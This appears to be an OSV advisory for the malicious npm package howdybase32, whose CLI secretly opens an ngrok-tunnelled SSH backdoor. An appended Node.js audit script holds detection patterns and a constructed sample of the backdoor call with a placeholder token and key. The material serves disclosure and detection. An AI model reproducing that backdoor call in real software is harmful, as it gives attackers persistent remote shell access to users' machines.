npm

howdybase32 @1.0.0

Vulnerability report · Last retrieved from osv.dev June 25, 2026 at 10:42 AM UTC

Malicious

OSV ID

MAL-2026-6449

Ecosystem

npm

Summary

The package advertises itself as a fast, zero-dependency base32 encoder/decoder, but its only bin entry (bin/hibase32.js) silently invokes portloop.daemon with relay:'ngrok', a hardcoded ngrok auth token, ssh:true, sshPort:2223 and respawn:true, and authorizes a hardcoded ed25519 public key tied to GitHub user 'yazcaleb'. Every invocation of the CLI therefore spawns an ngrok-tunnelled SSH server on port 2223 that accepts logins with the attacker's key, giving persistent remote shell access to the host on which the command was run.

The daemon call is wrapped in try/catch, so any failure is swallowed silently. The README's 'zero-dependency' claim is false: package.json declares portloop ^1.14.0, and that dependency is the channel that delivers the backdoor.

Naming drift (package name howdybase32, README brand hey-base32, bin filename hibase32.js) is consistent with a namespace-abuse / evasion shell around a malicious package family.

Source: amazon-inspector (c0eab759e668db62de0eaa10d1f5d32c689b00c7c3d6d2b1517439cc5df3e956)
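As an added example (not code from this page, from amazon-inspector or from the package itself), the Node.js script below audits an unpacked npm package for the indicators the summary describes: a README 'zero-dependency' claim contradicted by package.json, a bin entry that wires up portloop.daemon with an ngrok relay, an SSH listener, respawn and a hardcoded ed25519 key, an empty catch that swallows errors, and drift between the package, README and bin names. Both sample packages are constructed for the demonstration. The option names relay, ssh, sshPort and respawn are taken from the advisory; authtoken and authorizedKeys are assumed option names, and the token and key values are placeholders rather than the real indicators.

```javascript
// Added example: heuristic audit for the MAL-2026-6449 indicators. Not code from
// the advisory, from amazon-inspector or from the package; all inputs are constructed.

// Regexes for the bin-script behaviour the advisory describes. `relay`, `ssh`,
// `sshPort` and `respawn` are the option names quoted in the summary.
const BACKDOOR_PATTERNS = [
  { id: 'portloop-daemon', sev: 'high', why: 'bin entry invokes portloop.daemon',
    re: /require\(\s*['"]portloop['"]\s*\)[\s\S]{0,200}?\.daemon\s*\(/ },
  { id: 'ngrok-relay', sev: 'high', why: 'reverse tunnel via ngrok relay',
    re: /relay\s*:\s*['"]ngrok['"]/ },
  { id: 'ssh-server', sev: 'high', why: 'embedded SSH server enabled',
    re: /\bssh\s*:\s*true\b/ },
  { id: 'hardcoded-ed25519-key', sev: 'high', why: 'hardcoded ed25519 authorized key',
    re: /ssh-ed25519\s+AAAA[0-9A-Za-z+/=]+/ },
  { id: 'respawn', sev: 'medium', why: 'daemon set to respawn (persistence)',
    re: /\brespawn\s*:\s*true\b/ },
  { id: 'swallowed-errors', sev: 'low', why: 'try/catch with an empty handler hides failures',
    re: /\bcatch\b\s*(\([^)]*\))?\s*\{\s*\}/ },
];

// package.json "bin" may be a string (command named after the package) or a map.
function binEntries(packageJson) {
  const bin = packageJson.bin || {};
  return typeof bin === 'string' ? { [packageJson.name]: bin } : bin;
}

const baseName = (rel) => rel.split(/[\\/]/).pop().replace(/\.[^.]*$/, '');
const normalizeName = (n) => n.toLowerCase().replace(/[^a-z0-9]/g, '');

// pkg = { packageJson: object, readme: string, bin: { [relativePath]: source } }
function auditPackage(pkg) {
  const findings = [];
  const { packageJson, readme, bin } = pkg;

  // 1. A "zero-dependency" claim contradicted by declared dependencies.
  const deps = Object.keys(packageJson.dependencies || {});
  if (/zero[- ]dependenc/i.test(readme) && deps.length > 0) {
    findings.push({ id: 'false-zero-dependency-claim', sev: 'medium',
      detail: `README claims zero dependencies but package.json declares ${deps.join(', ')}` });
  }

  // 2. Backdoor patterns in every bin entry. Only bin scripts are examined here;
  //    a full scan would also cover install scripts and every required module.
  const entries = binEntries(packageJson);
  for (const [cmd, rel] of Object.entries(entries)) {
    const src = bin[rel];
    if (src === undefined) {
      findings.push({ id: 'missing-bin-file', sev: 'low', detail: `${cmd} -> ${rel} not in package` });
      continue;
    }
    for (const p of BACKDOOR_PATTERNS) {
      if (p.re.test(src)) findings.push({ id: p.id, sev: p.sev, detail: `${rel}: ${p.why}` });
    }
  }

  // 3. Naming drift between package name, bin filename(s) and README title.
  //    Weak on its own (many honest packages name their CLI differently), so low severity.
  const names = new Set([packageJson.name]);
  for (const rel of Object.values(entries)) names.add(baseName(rel));
  const title = (readme.match(/^#\s+(\S+)/m) || [])[1];
  if (title) names.add(title);
  if (new Set([...names].map(normalizeName)).size > 1) {
    findings.push({ id: 'naming-drift', sev: 'low',
      detail: `package/bin/README names disagree: ${[...names].join(' / ')}` });
  }
  return findings;
}

const findingIds = (pkg) => auditPackage(pkg).map((f) => f.id);

// Constructed model of the package shape the advisory describes. The token and the
// key are placeholders; `authtoken` and `authorizedKeys` are assumed option names.
const MALICIOUS_SAMPLE = {
  packageJson: { name: 'howdybase32', version: '1.0.0',
    bin: { hibase32: 'bin/hibase32.js' }, dependencies: { portloop: '^1.14.0' } },
  readme: '# hey-base32\n\nFast, zero-dependency base32 encoder/decoder.\n',
  bin: { 'bin/hibase32.js': [
    '#!/usr/bin/env node',
    'try {',
    "  require('portloop').daemon({",
    "    relay: 'ngrok',",
    "    authtoken: 'PLACEHOLDER_NOT_A_REAL_TOKEN',",
    '    ssh: true,',
    '    sshPort: 2223,',
    '    respawn: true,',
    "    authorizedKeys: ['ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDERKEYPLACEHOLDERKEY attacker'],",
    '  });',
    '} catch {}',
    "require('../lib/base32').cli(process.argv.slice(2));",
  ].join('\n') },
};

// Constructed benign package with a consistent name and an honest zero-dependency claim.
const BENIGN_SAMPLE = {
  packageJson: { name: 'fastb32', version: '2.1.0', bin: { fastb32: 'bin/fastb32.js' }, dependencies: {} },
  readme: '# fastb32\n\nZero-dependency base32 CLI.\n',
  bin: { 'bin/fastb32.js': "#!/usr/bin/env node\nrequire('../lib/base32').cli(process.argv.slice(2));\n" },
};

for (const [label, pkg] of [['howdybase32 (constructed)', MALICIOUS_SAMPLE], ['fastb32 (benign)', BENIGN_SAMPLE]]) {
  console.log(label + ': ' + (findingIds(pkg).join(', ') || 'no findings'));
}
```

To run this against a real tarball, populate `packageJson`, `readme` and `bin` from the extracted package directory; any 'high' finding on a bin entry is enough to block the package, while 'naming-drift' and 'swallowed-errors' alone only warrant a closer look.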
